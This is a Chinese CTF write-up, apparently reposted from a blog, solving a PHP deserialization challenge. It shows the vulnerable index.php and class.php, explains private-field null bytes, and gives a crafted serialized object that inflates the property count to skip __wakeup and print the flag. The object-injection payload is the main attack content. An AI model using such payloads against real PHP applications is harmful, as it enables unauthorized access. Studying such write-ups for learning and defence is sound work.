标签:spl payload sorry min private lob audio ascii sel
题目上说有备份的好习惯,扫描目录得到www.zip
几个重要php文件内容:
index.php
1 <?php 2 include ‘class.php‘; 3 $select = $_GET[‘select‘]; 4 $res=unserialize(@$select); 5 ?>
代码第4行unserialize可能存在反序列化漏洞
class.php
1 <?php 2 include ‘flag.php‘; 3 error_reporting(0); 4 class Name{ 5 private $username = ‘nonono‘; 6 private $password = ‘yesyes‘; 7 8 public function __construct($username,$password){ 9 $this->username = $username; 10 $this->password = $password; 11 } 12 13 function __wakeup(){ 14 $this->username = ‘guest‘; 15 } 16 17 function __destruct(){ 18 if ($this->password != 100) { 19 echo "</br>NO!!!hacker!!!</br>"; 20 echo "You name is: "; 21 echo $this->username;echo "</br>"; 22 echo "You password is: "; 23 echo $this->password;echo "</br>"; 24 die(); 25 } 26 if ($this->username === ‘admin‘) { 27 global $flag; 28 echo $flag; 29 }else{ 30 echo "</br>hello my friend~~</br>sorry i can‘t give you the flag!"; 31 die(); 32 } 33 } 34 } 35 ?>
代码第26行如果username为admin便输出flag,从__destruct,__construct,__wakeup可以判断存在反序列化漏洞
php序列化与反序列化
序列化:函数为serialize(),把复杂的数据类型压缩到一个字符串中 数据类型可以是数组,字符串,对象等
反序列化:函数为unserialize(),将字符串转换成变量或对象的过程
常用的内置方法:
__construct():创建对象时初始化,当一个对象创建时被调用
__wakeup() 使用unserialize时触发
__sleep() 使用serialize时触发
__destruction():结束时销毁对象,当一个对象销毁时被调用
我们需要将Name类序列化的结果输出
<?php class Name{ private $username = ‘nonono‘; private $password = ‘yesyes‘; public function __construct($username,$password){ $this->username = $username; $this->password = $password; } } $a = new Name(‘admin‘,100); $b = serialize($a); echo $b;
输出结果为
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
输出结果中Name和username,Name和password之间是有不可见字符的,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上ascii为0的字符(不可见字符)
另外我们还需要绕过__wakeup方法
在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过 __wakeup()函数的执行
原本:O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
绕过:O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
所以payload为:
?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
标签:spl payload sorry min private lob audio ascii sel
原文地址:https://www.cnblogs.com/gtx690/p/13212947.html
